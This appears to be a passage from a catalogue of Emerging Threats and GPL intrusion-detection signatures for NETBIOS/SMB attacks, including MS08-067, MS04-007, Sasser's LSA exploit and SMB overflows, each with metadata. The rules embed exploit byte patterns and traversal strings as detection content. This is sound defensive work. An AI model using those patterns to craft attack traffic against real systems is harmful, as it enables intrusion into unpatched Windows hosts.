URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008707

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008708

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008708; classtype:attempted-admin; sid:2008708; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (18)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008708

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008709

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008709; classtype:attempted-admin; sid:2008709; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (19)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008709

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008710

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008710; classtype:attempted-admin; sid:2008710; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (20)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008710

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008712

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008712; classtype:attempted-admin; sid:2008712; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (22)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008712

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008713

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"/../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008713; classtype:attempted-admin; sid:2008713; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (23)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008713

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008714

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008714; classtype:attempted-admin; sid:2008714; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (24)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008714

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008715

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008715; classtype:attempted-admin; sid:2008715; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (25)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008715

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008717

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008717; classtype:attempted-admin; sid:2008717; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (27)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008717

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008718

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008718; classtype:attempted-admin; sid:2008718; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (28)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008718

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008719

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008719; classtype:attempted-admin; sid:2008719; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (29)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008719

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008720

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008720; classtype:attempted-admin; sid:2008720; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (30)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008720

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008721

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)"; flow:established,to_server; content:"|00 2e 00 2e 00 2f 00 2e 00 2e 00 2f 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 87|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008721; classtype:attempted-admin; sid:2008721; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 — Known Exploit Instance (2)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008721

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000017

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS NII Microsoft ASN.1 Library Buffer Overflow Exploit"; flow: to_server,established; content:"|A1 05 23 03 03 01 07|"; reference:url,www.microsoft.com/technet/security/bulletin/ms04-007.asp; reference:url,doc.emergingthreats.net/bin/view/Main/2000017; classtype:bad-unknown; sid:2000017; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : NII Microsoft ASN.1 Library Buffer Overflow Exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : bad-unknown

URL reference : url,www.microsoft.com/technet/security/bulletin/ms04-007.asp|url,doc.emergingthreats.net/bin/view/Main/2000017

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000032

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS LSA exploit"; flow: to_server,established; content:"|313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131|"; offset: 78; depth: 192; reference:url,www.eeye.com/html/research/advisories/AD20040501.html; reference:url,www.upenn.edu/computing/virus/04/w32.sasser.worm.html; reference:url,doc.emergingthreats.net/bin/view/Main/2000032; classtype:misc-activity; sid:2000032; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : LSA exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-activity

URL reference : url,www.eeye.com/html/research/advisories/AD20040501.html|url,www.upenn.edu/computing/virus/04/w32.sasser.worm.html|url,doc.emergingthreats.net/bin/view/Main/2000032

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2011526

#alert tcp any any -> $HOME_NET [139,445] (msg:"ET NETBIOS windows recycler request - suspicious"; flow:to_server,established; content:"|00 00 5C 00 72 00 65 00 63 00 79 00 63 00 6C 00 65 00 72 00 5C|"; reference:url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC; reference:url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FFakerecy.A; reference:url,support.microsoft.com/kb/971029; classtype:suspicious-filename-detect; sid:2011526; rev:1; metadata:created_at 2010_09_27, updated_at 2010_09_27;)

Name : windows recycler request - suspicious

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : suspicious-filename-detect

URL reference : url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC|url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe|url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FFakerecy.A|url,support.microsoft.com/kb/971029

CVE reference : Not defined

Creation date : 2010-09-27

Last modified date : 2010-09-27

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2001944

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS MS04-007 Kill-Bill ASN1 exploit attempt"; flow: established,to_server; content:"CCCC|20f0fd7f|SVWf"; reference:url,www.phreedom.org/solar/exploits/msasn1-bitstring/; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; reference:cve,CAN-2003-0818; reference:url,doc.emergingthreats.net/bin/view/Main/2001944; classtype:attempted-admin; sid:2001944; rev:7; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : MS04-007 Kill-Bill ASN1 exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.phreedom.org/solar/exploits/msasn1-bitstring/|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx|cve,CAN-2003-0818|url,doc.emergingthreats.net/bin/view/Main/2001944

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2011527

#alert tcp any any -> $HOME_NET [139,445] (msg:"ET NETBIOS windows recycler .exe request - suspicious"; flow:to_server,established; content:"|00 00 5C 00 72 00 65 00 63 00 79 00 63 00 6C 00 65 00 72 00 5C|"; content:"|00 2E 00 65 00 78 00 65|"; distance:0; reference:url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC; reference:url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe; classtype:suspicious-filename-detect; sid:2011527; rev:4; metadata:created_at 2010_09_27, updated_at 2010_09_27;)

Name : windows recycler .exe request - suspicious

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : suspicious-filename-detect

URL reference : url,about-threats.trendmicro.com/ArchiveMalware.aspx?name=WORM_AUTORUN.ZBC|url,www.symantec.com/connect/forums/virus-alert-crecyclers-1-5-21-1482476501-1644491937-682003330-1013svchostexe

CVE reference : Not defined

Creation date : 2010-09-27

Last modified date : 2010-09-27

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2012084

alert tcp $EXTERNAL_NET 445 -> $HOME_NET any (msg:"ET NETBIOS Microsoft Windows SMB Client Race Condition Remote Code Execution"; flow:to_client,established; content:"|ff 53 4d 42 72|"; offset:4; depth:5; content:"|00 00 00 00|"; distance:0; within:4; byte_test:4,<,4356,30,relative,little; reference:url,www.exploit-db.com/exploits/12258/; reference:cve,2010-0017; reference:bid,38100; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-006.mspx; classtype:attempted-user; sid:2012084; rev:2; metadata:created_at 2010_12_22, updated_at 2010_12_22;)

Name : Microsoft Windows SMB Client Race Condition Remote Code Execution

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : url,www.exploit-db.com/exploits/12258/|cve,2010-0017|bid,38100|url,www.microsoft.com/technet/security/Bulletin/MS10-006.mspx

CVE reference : Not defined

Creation date : 2010-12-22

Last modified date : 2010-12-22

Rev version : 2

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2012094

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow"; flow:to_server,established; content:"|ff 53 4d 42 32|"; offset:4; depth:5; content:"|00 00 00 00|"; distance:0; within:4; content:"|00 00|"; distance:30; within:2; content:"|00 03 00|"; distance:19; within:3; reference:url,www.exploit-db.com/exploits/14607/; reference:url,seclists.org/fulldisclosure/2010/Aug/122; reference:cve,2010-2550; reference:bid,42224; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-054.mspx; classtype:attempted-user; sid:2012094; rev:2; metadata:created_at 2010_12_23, updated_at 2010_12_23;)

Name : SMB Trans2 Query_Fs_Attribute_Info SrvSmbQueryFsInformation Pool Buffer Overflow

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : url,www.exploit-db.com/exploits/14607/|url,seclists.org/fulldisclosure/2010/Aug/122|cve,2010-2550|bid,42224|url,www.microsoft.com/technet/security/Bulletin/MS10-054.mspx

CVE reference : Not defined

Creation date : 2010-12-23

Last modified date : 2010-12-23

Rev version : 2

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2012317

alert udp $EXTERNAL_NET any -> $HOME_NET [137,138,139,445] (msg:"ET NETBIOS Microsoft Windows Server 2003 Active Directory Pre-Auth BROWSER ELECTION Heap Overflow Attempt"; content:"|42 4F 00|"; content:"BROWSER"; nocase; distance:0; content:"|08 09 A8 0F 01 20|"; fast_pattern; distance:0; isdataat:65,relative; content:!"|0A|"; within:65; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=22457; reference:bid,46360; classtype:attempted-admin; sid:2012317; rev:2; metadata:created_at 2011_02_17, updated_at 2011_02_17;)

Name : Microsoft Windows Server 2003 Active Directory Pre-Auth BROWSER ELECTION Heap Overflow Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,tools.cisco.com/security/center/viewAlert.x?alertId=22457|bid,46360

CVE reference : Not defined

Creation date : 2011-02-17

Last modified date : 2011-02-17

Rev version : 2

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102480

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102480; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102481

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102481; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102482

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102482; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102483

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102483; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102479

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102479; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102478

